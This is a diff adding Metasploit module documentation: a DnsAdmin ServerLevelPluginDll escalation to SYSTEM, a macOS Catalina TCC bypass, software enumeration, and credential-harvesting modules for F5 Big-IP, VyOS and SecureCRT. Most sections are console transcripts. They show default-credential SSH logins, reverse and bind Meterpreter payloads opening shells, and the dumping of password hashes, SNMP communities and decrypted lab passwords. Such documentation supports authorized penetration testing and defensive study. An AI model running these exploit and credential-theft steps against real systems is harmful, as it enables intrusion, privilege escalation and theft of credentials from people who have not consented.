+[*] Using user-provided UNC path.
+[!] Entering danger section...
+[*] Modifying ServerLevelPluginDll to point to \\172.17.168.195\test\mp4.dll...
+[+] Registry property serverlevelplugindll successfully reset.
+[*] Restarting the DNS service...
+[*] Started bind TCP handler against 172.17.169.123:6688
+[*] Sending stage (200262 bytes) to 172.17.169.123
+[*] Meterpreter session 4 opened (0.0.0.0:0 -> 172.17.169.123:6688) at 2020-09-09 15:06:33 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-M5JU6L5RA9L
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : RAPID7
+Logged On Users : 12
+Meterpreter     : x64/windows
+meterpreter > 
+```
+
+### Windows Server 2019 Standard x64, just creating DLL
+```
+msf6 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+[*] Using configured payload windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 3 
+SESSION => 3
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/bind_tcp
+PAYLOAD => windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 6688
+LPORT => 6688
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME mp4.dll
+DLLNAME => mp4.dll
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
+MAKEDLL => true
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > show options
+
+Module options (exploit/windows/local/dnsadmin_serverlevelplugindll):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   AVTIMEOUT  60               yes       Time to wait for AV to potentially notice the DLL file we dropped, in seconds.
+   DLLNAME    mp4.dll          yes       DLL name (default: msf.dll)
+   DLLPATH    %TEMP%           yes       Path to DLL. Can be a UNC path. (default: %TEMP%)
+   MAKEDLL    true             yes       Just create the DLL, do not exploit.
+   SESSION    3                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     6688             yes       The listen port
+   RHOST     172.17.169.123   no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Building DLL...
+[+] mp4.dll stored at /home/gwillcox/.msf4/local/mp4.dll
+[*] Started bind TCP handler against 172.17.169.123:6688
+[*] Exploit completed, but no session was created.
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) >
+```
+
+## Notes
+1. This module is not particularly opsec-safe as it drops a DLL to disk, writes to
+the registry, and is sure to generate a ton of event logs when the DNS service is
+stopped and restarted..
+2. Automatic cleanup of the dropped DLL is attempted if the DLL has been written to
+disk, but if automatic cleanup fails manual cleanup may be necessary.
@@ -0,0 +1,51 @@
+## Vulnerable Application
+
+  This module uses an existing session on any Windows, Linux, BSD, Solaris, OSX or Android machine
+  to gather information about all software installed on the target machine and their versions.
+
+  This module therefore targets any machine running Windows, Linux, BSD, Solaris, OSX, or Android. Note
+  that for Linux systems, software enumeration is done via package managers. As a result the results may
+  not reflect all of the available software on the system simply because users may have installed additional
+  software from alternative sources such as source code that these package managers are not aware of.
+
+## Verification Steps
+
+  1. Get session
+  2. Do `use post/multi/gather/enum_software_versions`
+  3. Do `set SESSION <session id>`
+  4. Do `run`
+  5. See loot.
+
+## Options
+
+This module does not use any special options beyond the standard `SESSION` option which 
+is set to the value of the session the user wishes to run this module on.
+
+## Scenarios
+
+### Windows Server 2019 Standard Edition x64 Running as a Low Privileged User
+```
+msf6 exploit(multi/handler) > use post/multi/gather/enum_software_versions 
+msf6 post(multi/gather/enum_software_versions) > show options
+
+Module options (post/multi/gather/enum_software_versions):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+msf6 post(multi/gather/enum_software_versions) > set SESSION 1 
+SESSION => 1
+msf6 post(multi/gather/enum_software_versions) > run
+
+[+] Stored information about the installed products to the loot file at /home/gwillcox/.msf4/loot/20200915173649_default_172.27.37.216_host.windows.sof_930739.txt
+[*] Post module execution completed
+msf6 post(multi/gather/enum_software_versions) > cat /home/gwillcox/.msf4/loot/20200915173649_default_172.27.37.216_host.windows.sof_930739.txt
+[*] exec: cat /home/gwillcox/.msf4/loot/20200915173649_default_172.27.37.216_host.windows.sof_930739.txt
+
+Description                     InstallDate  Name                            Version      
+Pragma TelnetServer             20200911     Pragma TelnetServer             7.0.10.1990  
+Google Update Helper            20200910     Google Update Helper            1.3.35.451   
+VanDyke Software SecureCRT 8.7  20200911     VanDyke Software SecureCRT 8.7  8.7.3        
+msf6 post(multi/gather/enum_software_versions) > 
+```
@@ -8,7 +8,7 @@ This module has been tested on the following hardware/OS combinations.
 The ICX config can be found [no passwords](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_icx6430_nopass.conf),
 [hashes](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_icx6430_pass.conf)

-This module will look for the follow parameters which contain credentials:
+This module will look for the following parameters which contain credentials:

 * FastIron
  * `show configuration`
@@ -10,7 +10,7 @@ The Catalyst 2950 config can be found [here](https://github.com/h00die/MSF-Testi

 The UC520 config can be found [here](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/cisco-uc520.config)

-This module will look for the follow parameters which contain credentials:
+This module will look for the following parameters which contain credentials:

 * IOS
  * enable
@@ -0,0 +1,105 @@
+## Vulnerable Application
+
+This module has been tested on the following hardware/OS combinations.
+
+* F5 Big-IP 15.1.0.2
+
+This module will look for the following parameters which contain credentials:
+
+* Big-IP
+  * user
+  * SNMP
+  * key hashes
+  * SSL keys
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a shell
+1. Do: `use post/networking/gather/enum_f5`
+1. Do: `set session [id]`
+1. Do: `set verbose true`
+1. Do: `run`
+
+## Options
+
+## Scenarios
+
+### F5 Big-IP 15.1.0.2
+
+```
+resource (f5_ssh.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (f5_ssh.rb)> set username root
+username => root
+resource (f5_ssh.rb)> set password f5-bigip
+password => f5-bigip
+resource (f5_ssh.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (f5_ssh.rb)> run
+[+] 2.2.2.2:22 - Success: 'root:f5-bigip' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux f5bigip.ragedomain 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Fri Mar 20 17:06:49 PDT 2020 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 1 opened (1.1.1.1:42443 -> 2.2.2.2:22) at 2020-08-20 14:39:08 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+```
+resource (f5_ssh.rb)> use post/networking/gather/enum_f5
+resource (f5_ssh.rb)> set session 1
+session => 1
+resource (f5_ssh.rb)> set verbose true
+verbose => true
+resource (f5_ssh.rb)> run
+[!] SESSION may not be compatible with this module.
+[*] Moving to TMOS prompt
+[+] Config information stored in to loot /home/h00die/.msf4/loot/20200820143924_default_2.2.2.2_f5.version_351096.txt
+[+] Version: BIG-IP 15.1.0.2 0.0.9
+[*] Gathering info from show sys
+[+] Saving to /home/h00die/.msf4/loot/20200820143929_default_2.2.2.2_F5.show_sys_066269.txt
+[+] 2.2.2.2:22 F5 master-key hash EFt+B7/aTWwPwLoMd8KLYW4JB3K5B6301k4pGsoWnZEb2yUbvEJgNU3FcLHo0S4QvdrwVcKrNtHLzebC7HizHQ==
+[+] 2.2.2.2:22 F5 previous hash EFt+B7/aTWwPwLoMd8KLYW4JB3K5B6301k4pGsoWnZEb2yUbvEJgNU3FcLHo0S4QvdrwVcKrNtHLzebC7HizHQ==
+[*] Gathering info from show auth
+[+] Saving to /home/h00die/.msf4/loot/20200820143934_default_2.2.2.2_F5.show_auth_823862.txt
+[*] Gathering info from show cm
+[+] Saving to /home/h00die/.msf4/loot/20200820143939_default_2.2.2.2_F5.show_cm_704510.txt
+[*] Gathering info from show net
+[+] Saving to /home/h00die/.msf4/loot/20200820143944_default_2.2.2.2_F5.show_net_045166.txt
+[*] Gathering info from show running-config
+[+] Saving to /home/h00die/.msf4/loot/20200820143949_default_2.2.2.2_F5.show_running__097351.txt
+[+] 2.2.2.2:22 Username 'admin' with description 'Admin User' and shell tmsh with hash $6$PQvaMmyS$Bn5.2qIin7rC34tHUQ1Vu6fEeuDzQZqc25TSiDsmbB903RENBisWbTN9Mqh7g2x26VUbxdzwUzzmL7fB4T2iy1
+[+] 2.2.2.2:22 Username 'superlegit' with description 'a user account' and shell tmsh with hash $6$FTQz2reX$U0o37QjQYdg42dwCcLa.1H85hVTriQtxhlMoIM0cs4DFyW5s26kbrEgZG5Mfaxi9fgFfHrvDBGad7ikXnEZIP0
+[+] 2.2.2.2:22 Username 't' with description 't' and shell none with hash $6$iajXIq2B$ezy4hVW9A.5eN1xG4JZWFbY4bFaq7uUKwO9gDVLxvgzigsX4gquLW1NoSaZP9CtN0NnrbGV4QvtkA.esLJOg50
+[+] 2.2.2.2:22 SNMP Community 'public' with RO access
+[+] 2.2.2.2:22 SNMP Community 'rocommunity' with RO access
+[+] 2.2.2.2:22 SNMP Community 'rwcommunity' with RW access
+[+] 2.2.2.2:22 Hostname: f5bigip.ragedomain
+[+] 2.2.2.2:22 MAC Address: 00:0c:29:18:49:c7
+[+] 2.2.2.2:22 Management IP: 2.2.2.2
+[+] 2.2.2.2:22 Product BIG-IP
+[+] 2.2.2.2:22 OS Version: 15.1.0.2
+[+] 2.2.2.2:22 SSL Key 'f5_api_com.key' and hash $M$by$gXTDo23Gz+Yz4fWA4uBbTccd+oD1pdsXJbwhvhMPiss4Iw0RKIJQS/CuSReZl/+kseKpPCNpBWNWOOaBCwlQ0v4sl7ZUkxCymh5pfFNAjhc= for /config/ssl/ssl.key/f5_api_com.key
+[*] Gathering info from show sys crypto master-key
+[+] Saving to /home/h00die/.msf4/loot/20200820143954_default_2.2.2.2_F5.show_crypto_k_313673.txt
+[+] 2.2.2.2:22 F5 master-key hash EFt+B7/aTWwPwLoMd8KLYW4JB3K5B6301k4pGsoWnZEb2yUbvEJgNU3FcLHo0S4QvdrwVcKrNtHLzebC7HizHQ==
+[+] 2.2.2.2:22 F5 previous hash EFt+B7/aTWwPwLoMd8KLYW4JB3K5B6301k4pGsoWnZEb2yUbvEJgNU3FcLHo0S4QvdrwVcKrNtHLzebC7HizHQ==
+[*] Gathering info from cat /config/bigip.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144005_default_2.2.2.2_F5.bigip.conf_401821.txt
+[+] 2.2.2.2:22 SSL Key '/Common/f5_api_com.key' and hash $M$iE$cIdy72xi7Xbk3kazSrpdfscd+oD1pdsXJbwhvhMPiss4Iw0RKIJQS/CuSReZl/+kseKpPCNpBWNWOOaBCwlQ0v4sl7ZUkxCymh5pfFNAjhc= for /config/ssl/ssl.key/f5_api_com.key
+[*] Gathering info from cat /config/bigip_base.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144010_default_2.2.2.2_F5.bigip_base.co_869534.txt
+[+] 2.2.2.2:22 SNMP Community 'public' with RO access
+[+] 2.2.2.2:22 Hostname: f5bigip.ragegroup.com
+[+] 2.2.2.2:22 MAC Address: 00:0c:29:18:49:c7
+[+] 2.2.2.2:22 Management IP: 2.2.2.2
+[+] 2.2.2.2:22 Product BIG-IP
+[+] 2.2.2.2:22 OS Version: 15.1.0.2
+[*] Gathering info from cat /config/bigip_gtm.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144015_default_2.2.2.2_F5.bigip_gtm.con_315221.txt
+[*] Gathering info from cat /config/bigip_script.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144020_default_2.2.2.2_F5.bigip_script._498011.txt
+[*] Gathering info from cat /config/bigip_user.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144025_default_2.2.2.2_F5.bigip_user.co_687618.txt
+[*] Gathering info from cat /config/user_alert.conf
+[+] Saving to /home/h00die/.msf4/loot/20200820144030_default_2.2.2.2_F5.user_alert.co_138139.txt
+[*] Post module execution completed
+```
+
@@ -8,7 +8,7 @@ This module has been tested on the following hardware/OS combinations.

 The ex2200 config can be found [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_ex2200.config)

-This module will look for the follow parameters which contain credentials:
+This module will look for the following parameters which contain credentials:

 * ScreenOS
  * admin
@@ -0,0 +1,194 @@
+## Vulnerable Application
+
+This module has been tested on the following hardware/OS combinations.
+
+* VyOS 1.1.8
+* VyOS 1.3 (reconfigured to allow ssh password login)
+
+The images are available from VyOS [here](https://downloads.vyos.io/)
+
+This module runs the following commands to gather data:
+
+* equivalent of `show version`
+* `cat /config/config`
+* `cat /config/config.boot`
+
+This module will look for the follow parameters which contain credentials:
+
+* `snmp community`
+* `wireless`
+* `login user`
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a shell
+3. Do: ```use post/networking/gather/enum_vyos```
+4. Do: ```set session [id]```
+5. Do: ```set verbose true```
+6. Do: ```run```
+
+## Options
+
+## Scenarios
+
+### VyOS 1.1.8 admin
+
+```
+resource (vyos.rb)> set username vyos
+username => vyos
+resource (vyos.rb)> set password vyos
+password => vyos
+resource (vyos.rb)> run
+[+] 2.2.2.2:22 - Success: 'vyos:vyos' 'uid=1000(vyos) gid=100(users) groups=100(users),4(adm),6(disk),27(sudo),30(dip),102(quaggavty),104(vyattacfg),110(fuse) Linux vyos118 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux '
+[*] Command shell session 1 opened (1.1.1.1:34571 -> 2.2.2.2:22) at 2020-09-20 15:19:08 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+```
+resource (vyos.rb)> use post/networking/gather/enum_vyos
+resource (vyos.rb)> set verbose true
+verbose => true
+resource (vyos.rb)> set session 1
+session => 1
+resource (vyos.rb)> run
+[!] SESSION may not be compatible with this module.
+[*] Getting version information
+[+] Version:      VyOS 1.1.8
+Description:  VyOS 1.1.8 (helium)
+Copyright:    2017 VyOS maintainers and contributors
+Built by:     maintainers@vyos.net
+Built on:     Sat Nov 11 13:44:36 UTC 2017
+Build ID:     1711111344-b483efc
+System type:  x86 64-bit
+Boot via:     image
+Hypervisor:   VMware
+HW model:     VMware Virtual Platform
+HW S/N:       VMware-56 4d ef 3f af 45 b5 69-27 43 79 f1 93 f4 45 0a
+HW UUID:      564DEF3F-AF45-B569-2743-79F193F4450A
+Uptime:       19:09:24 up  4:47,  1 user,  load average: 0.01, 0.04, 0.05
+
+
+
+[+] Version information stored in to loot /home/h00die/.msf4/loot/20200920151918_default_2.2.2.2_vyos.version_808443.txt
+[*] Gathering info from cat /config/config
+[*] Gathering info from cat /config/config.boot
+[+] 2.2.2.2:22 Username 'jsmith' with level 'operator' with hash $6$b/9HkzK14DtQm3W$UL5z9yGDoX8j13meRLFEGYkn8popOtCa91wwg8qxOFIfQcWBuXQDDiy8NhdPhpnYieBykj1ddytJAwU6C4mrH1
+[+] 2.2.2.2:22 Username 'vyos' with level 'admin' with hash $1$hTBP1zOx$M0WnYPshI2piRc7.XnwBU0
+[+] 2.2.2.2:22 SNMP Community 'ro' with ro access
+[+] 2.2.2.2:22 SNMP Community 'write' with rw access
+[+] 2.2.2.2:22 Hostname: vyos118
+[+] 2.2.2.2:22 OS Version: VyOS 1.1.8
+[+] 2.2.2.2:22 Interface eth1 (00:0c:29:f4:45:14) - 2.2.2.2
+[*] Post module execution completed
+```
+
+### VyOS 1.1.8 operator (user)
+
+```
+resource (vyos.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (vyos.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (vyos.rb)> set username jsmith
+username => jsmith
+resource (vyos.rb)> set password jsmith
+password => jsmith
+resource (vyos.rb)> run
+[+] 2.2.2.2:22 - Success: 'jsmith:jsmith' 'Remote command execution is not allowed for operator level users Remote command execution is not allowed for operator level users '
+[*] Command shell session 2 opened (1.1.1.1:46409 -> 2.2.2.2:22) at 2020-09-20 15:19:29 -0400
+[-] 2.2.2.2:22 - While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (vyos.rb)> use post/networking/gather/enum_vyos
+resource (vyos.rb)> set session 2
+session => 2
+resource (vyos.rb)> run
+[!] SESSION may not be compatible with this module.
+[*] Getting version information
+[+] Version:      VyOS 1.1.8
+Description:  VyOS 1.1.8 (helium)
+Copyright:    2017 VyOS maintainers and contributors
+Built by:     maintainers@vyos.net
+Built on:     Sat Nov 11 13:44:36 UTC 2017
+Build ID:     1711111344-b483efc
+System type:  x86 64-bit
+Boot via:     image
+Hypervisor:   VMware
+HW model:     VMware Virtual Platform
+HW S/N:       VMware-56 4d ef 3f af 45 b5 69-27 43 79 f1 93 f4 45 0a
+HW UUID:      564DEF3F-AF45-B569-2743-79F193F4450A
+Uptime:       19:09:44 up  4:47,  1 user,  load average: 0.00, 0.03, 0.05
+
+
+[+] Version information stored in to loot /home/h00die/.msf4/loot/20200920151939_default_2.2.2.2_vyos.version_165334.txt
+[*] Gathering info from cat /config/config
+[*] Gathering info from cat /config/config.boot
+[+] 2.2.2.2:22 Username 'jsmith' with level 'operator' with hash $6$b/9HkzK14DtQm3W$UL5z9yGDoX8j13meRLFEGYkn8popOtCa91wwg8qxOFIfQcWBuXQDDiy8NhdPhpnYieBykj1ddytJAwU6C4mrH1
+[+] 2.2.2.2:22 Username 'vyos' with level 'admin' with hash $1$hTBP1zOx$M0WnYPshI2piRc7.XnwBU0
+[+] 2.2.2.2:22 SNMP Community 'ro' with ro access
+[+] 2.2.2.2:22 SNMP Community 'write' with rw access
+[+] 2.2.2.2:22 Hostname: vyos118
+[+] 2.2.2.2:22 OS Version: VyOS 1.1.8
+[+] 2.2.2.2:22 Interface eth1 (00:0c:29:f4:45:14) - 2.2.2.2
+[*] Post module execution completed
+```
+
+### VyOS 1.3 admin
+
+```
+resource (vyos.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (vyos.rb)> set rhosts 3.3.3.3
+rhosts => 3.3.3.3
+resource (vyos.rb)> set username vyos
+username => vyos
+resource (vyos.rb)> set password vyos
+password => vyos
+resource (vyos.rb)> run
+[+] 3.3.3.3:22 - Success: 'vyos:vyos' 'uid=1003(vyos) gid=100(users) groups=100(users),4(adm),6(disk),27(sudo),30(dip),105(vyattacfg),116(frrvty) Linux vyos13 4.19.142-amd64-vyos #1 SMP Wed Aug 26 18:33:29 UTC 2020 x86_64 GNU/Linux '
+[*] Command shell session 1 opened (1.1.1.1:42141 -> 3.3.3.3:22) at 2020-09-20 15:33:20 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+```
+resource (vyos.rb)> use post/networking/gather/enum_vyos
+resource (vyos.rb)> set verbose true
+verbose => true
+resource (vyos.rb)> set session 1
+session => 1
+resource (vyos.rb)> run
+[!] SESSION may not be compatible with this module.
+[*] Getting version information
+[+] 
+Version:          VyOS 1.3-rolling-202008270118
+Release Train:    equuleus
+
+Built by:         autobuild@vyos.net
+Built on:         Thu 27 Aug 2020 01:18 UTC
+Build UUID:       b3cfc450-921a-4454-aa8a-eca18c88517b
+Build Commit ID:  303a91836dc31c
+
+Architecture:     x86_64
+Boot via:         installed image
+System type:      VMware guest
+
+Hardware vendor:  VMware, Inc.
+Hardware model:   VMware Virtual Platform
+Hardware S/N:     Unknown
+Hardware UUID:    Unknown
+
+Copyright:        VyOS maintainers and contributors
+
+[+] Version information stored in to loot /home/h00die/.msf4/loot/20200920153335_default_3.3.3.3_vyos.version_336120.txt
+[*] Gathering info from cat /config/config
+[+] 3.3.3.3:22 SNMP Community 'ro' with ro access
+[+] 3.3.3.3:22 SNMP Community 'write' with rw access
+[+] 3.3.3.3:22 Hostname: vyos
+[+] 3.3.3.3:22 OS Version: 1.3-rolling-202008270118
+[+] 3.3.3.3:22 Interface eth0 (00:0c:29:ab:ce:16) - 10.10.10.10 with description: desc two
+[+] 3.3.3.3:22 Interface eth1 (00:0c:29:ab:ce:20)
+[*] Gathering info from cat /config/config.boot
+[+] 3.3.3.3:22 Hostname: vyos13
+[+] 3.3.3.3:22 OS Version: 1.3-rolling-202008270118
+[+] 3.3.3.3:22 Interface eth1 (00:0c:29:ab:ce:20) - 3.3.3.3
+[*] Post module execution completed
+```
@@ -0,0 +1,91 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in the TCC daemon on macOS Catalina
+(<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be
+manipulated (by setting the HOME environment variable) to use a new user
+controlled location as the TCC database. We can then grant ourselves
+entitlements by inserting them into this new database.
+
+## Verification Steps
+
+  1. Start msfconsole
+  1. Get a user session on OSX 10.15.5 (or lower)
+  1. Do: ```use post/osx/escalate/tccbypass```
+  1. Do: ```set SESSION -1```
+  1. Do: ```run```
+  1. Your session should now be able to access the ~/Documents folder
+
+## Scenarios
+
+### User level shell on macOS Catalina 10.15.4
+
+```
+msf6 > use payload/osx/x64/meterpreter/reverse_tcp
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lhost 192.168.135.197
+lhost => 192.168.135.197
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lport 4567
+lport => 4567
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > generate -f macho -o revtcpx64.mac
+[*] Writing 17204 bytes to revtcpx64.mac...
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 0
+
+[*] Started reverse TCP handler on 192.168.135.197:4567 
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > [*] Transmitting first stager...(210 bytes)
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (799916 bytes) to 192.168.132.178
+[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.132.178:49156) at 2020-09-10 11:44:05 -0500
+
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer     : msfusers-Mac.local
+OS           : macOS Catalina (macOS 10.15.4)
+Architecture : x86
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+meterpreter > getuid
+Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
+meterpreter > ls Documents
+[-] 1009: Operation failed: 1
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 payload(osx/x64/meterpreter/reverse_tcp) > use post/osx/escalate/tccbypass 
+msf6 post(osx/escalate/tccbypass) > show options
+
+Module options (post/osx/escalate/tccbypass):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+msf6 post(osx/escalate/tccbypass) > set session 1
+session => 1
+msf6 post(osx/escalate/tccbypass) > set verbose true
+verbose => true
+msf6 post(osx/escalate/tccbypass) > run
+
+[*] Creating TCC directory /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC
+[+] fake TCC DB found: /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC/TCC.db
+[+] TCC.db was successfully updated!
+[*] To cleanup, run:
+launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
+rm -rf '/tmp/.SZulaEVB'
+
+[*] Post module execution completed
+msf6 post(osx/escalate/tccbypass) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
+meterpreter > ls Documents 
+Listing: Documents
+==================
+
+Mode              Size  Type  Last modified              Name
+----              ----  ----  -------------              ----
+100644/rw-r--r--  0     fil   2020-08-14 13:51:29 -0500  .localized
+
+meterpreter > 
+```
@@ -0,0 +1,185 @@
+## Vulnerable Application
+
+All [SecureCRT](https://www.vandyke.com/cgi-bin/releases.php?product=securecrt) installations are affected, regardless
+of which OS they are installed on, since they all use the same encryption mechanisms described by HyperSine in
+his [GitHub paper](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password).
+Note that at the moment this module only supports exploiting Windows machines.
+
+### Overview
+All versions of SecureCRT have an option to allow users to store an encrypted copy of their session information on the
+local computer, allowing them to easily restart a session without having to reenter all the connection details such as
+the host, username, and password. These details are stored in a local session file, and SecureCRT will additionally
+encrypt the password with AES encryption.
+
+Unfortunately for SecureCRT users, the encryption mechanism used uses a weak IV of all 0's, and the encryption
+keys that are utilized to encrypt the passwords have been publicly reversed and documented by HyperSine
+in [his GitHub paper](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password).
+
+In addition, HyperSine also published a PoC script that allows users to decrypt SecureCRT session files, regardless
+of the version of SecureCRT installed. The only limitation is that users must know the SecureCRT configuration password
+if one was set at installation. At the time of writing, September 11, 2020, it appears that Vandyke, the creators of
+SecureCRT, have still not changed the implementation details for this session encryption algorithm.
+
+This module ports the work from HyperSine and implements it in a Metasploit module that allows users to easily retrieve
+any SecureCRT session files from a compromised Windows machine and then decrypt the session passwords where its possible
+to do so. All session information retrieved will be stored a Metasploit loot file, along with the password if
+it can be decrypted.
+
+### Setup Steps
+
+1. Download the latest installer of SecureCRT from https://www.vandyke.com/cgi-bin/releases.php?product=securecrt.
+   You will need a valid login, which can be obtained by completing the registration form at
+   https://www.vandyke.com/cgi-bin/download_application.php?pid=scrt_x64_873&force=1, after which an
+   email will be sent to you with the valid login details.
+2. Follow the installer's prompts to install the software. Select all the default settings.
+3. Once everything has been installed, start SecureCRT. A prompt will appear asking if one wants to set a
+   configuration passphrase to encrypt sensitive data such as saved passwords and login actions. Set a
+   passphrase of your choice here, but be sure to remember it.
+4. Set up a SSH server on your target. For Windows 10 v1809 and later and
+   Windows Server 2019 and later, this can be done by running the PowerShell
+   command `Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0`,
+   followed by `Start-Service sshd`.
+
+## Verification Steps
+
+  1. Use SecureCRT to login to a SSH server of your choosing. When logging in,
+     remember to select the check boxes to save the username (should be selected
+     by default), as well as the checkbox to save the account password.
+  3. Get a `meterpreter` session on the Windows host running SecureCRT.
+  4. Do: `run post/windows/gather/credentials/securecrt`
+  5. Optional: Run `set PASSPHRASE *SecureCRT configuration passphrase*` if a configuration
+     passphrase was set for SecureCRT and you are aware of what its value is.
+  5. If the session file was saved on the target, the module will print out the details
+     of the host and port that the user connected to, as well as which username the user
+     signed in with and the plaintext version of the password that was used.
+
+## Options
+
+### PASSPHRASE
+The configuration password that was set when SecureCRT was installed, if one was supplied.
+Note that if this value is not supplied and SecureCRT was set up to use a configuration password,
+it will not be possible to decrypt the encrypted SecureCRT passwords that are retrieved.
+
+### SESSION_PATH
+The path to the SecureCRT session directory on the target's computer. By default this is normally
+stored at `C:\\Users\\*current user name*\\AppData\\Roaming\\VanDyke\\Config\\Sessions` if SecureCRT
+is installed on the system, however SecureCRT also has a portable version that stores the session information
+in a local folder along with the SecureCRT binary itself, allowing users to easily transfer their session
+information between machines. In this case, users can set the `SESSION_PATH` option to the location
+of the session directory within the portable folder to allow them to obtain SecureCRT session
+information even if a portable version of SecureCRT is utilized on the target.
+
+## Scenarios
+
+### Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled)
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
+msf6 post(windows/gather/credentials/securecrt) > info
+
+       Name: Windows SecureCRT Session Information Enumeration
+     Module: post/windows/gather/credentials/securecrt
+   Platform: Windows
+       Arch:
+       Rank: Normal
+
+Provided by:
+  HyperSine
+  Kali-Team <kali-team@qq.com>
+
+Compatible session types:
+  Meterpreter
+
+Basic options:
+  Name        Current Setting   Required  Description
+  ----        ---------------   --------  -----------
+  PASSPHRASE                    no        The configuration password that was set when SecureCRT was installed, if one was supplied
+  SESSION                       yes       The session to run this module on.
+
+Description:
+  This module will determine if SecureCRT is installed on the target
+  system and, if it is, it will try to dump all saved session
+  information from the target. The passwords for these saved sessions
+  will then be decrypted where possible, using the decryption
+  information that HyperSine reverse engineered. Note that whilst
+  SecureCRT has installers for Linux, Mac and Windows, this module
+  presently only works on Windows.
+
+References:
+  https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
+
+msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
+SESSION => 1
+msf6 post(windows/gather/credentials/securecrt) > set Passphrase whatabadpassword
+Passphrase => whatabadpassword
+msf6 post(windows/gather/credentials/securecrt) > run
+
+[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
+[*] Searching for session files in C:\Users\normal\AppData\Roaming\VanDyke\Config\Sessions
+SecureCRT Sessions
+==================
+
+Filename           Protocol  Hostname   Port  Username              Password
+--------           --------  --------   ----  --------              --------
+127.0.0.1 (1).ini  telnet    127.0.0.1  23    RAPID7\Administrator  thePassword123!
+127.0.0.1 (2).ini  ssh2      127.0.0.1  22    Administrator         thePassword123!
+127.0.0.1 (3).ini  ssh2      127.0.0.1  22    Administrator
+127.0.0.1.ini      telnet    127.0.0.1  23
+
+msf6 post(windows/gather/credentials/securecrt) >
+```
+
